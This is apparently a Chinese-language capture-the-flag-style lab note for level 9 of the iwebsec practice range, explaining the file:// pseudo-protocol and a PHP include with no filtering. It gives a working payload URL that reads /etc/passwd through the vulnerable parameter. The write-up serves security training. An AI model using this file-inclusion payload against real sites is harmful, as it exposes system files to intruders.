iwebsec靶场 文件包含漏洞通关笔记9-file://伪协议利用

目录

前言

1.file协议

2.利用条件

(1)file://用于访问本地文件系统

(2)file://必须是绝对路径

第09关 file://伪协议利用

1.打开靶场

2.源码分析

3.获取/etc/passwd渗透


前言

1.file协议

file协议也叫本地文件传输协议 ,主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件或者通过右键单击‘打开’一样。
基本的格式:file:///文件路径
 

2.利用条件

(1)file://用于访问本地文件系统

在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响(相同类型的还有zip://等)

(2)file://必须是绝对路径

第09关 file://伪协议利用

1.打开靶场

http://iwebsec.com:81/fi/09.php

iwebsec靶场 文件包含漏洞通关笔记9-file://伪协议利用_第1张图片

2.源码分析

源码使用了include函数,并没有对参数做任何过滤,存在文件包含漏洞



	
		file://伪协议利用
	
	

file://伪协议利用

/09.php?filename=file:///etc/passwd

3.获取/etc/passwd渗透

想要获取file:///etc/passwd,使用file协议file://,于是file渗透参数为

file:///etc/passwd

即渗透路径为

http://iwebsec.com:81/fi/09.php?filename=file:///etc/passwdicon-default.png?t=N7T8http://iwebsec.com:81/fi/09.php?filename=file:///etc/passwd效果如下所示,渗透成功

iwebsec靶场 文件包含漏洞通关笔记9-file://伪协议利用_第2张图片

你可能感兴趣的:(iwebsec靶场,网络安全,web安全,渗透测试,文件包含漏洞)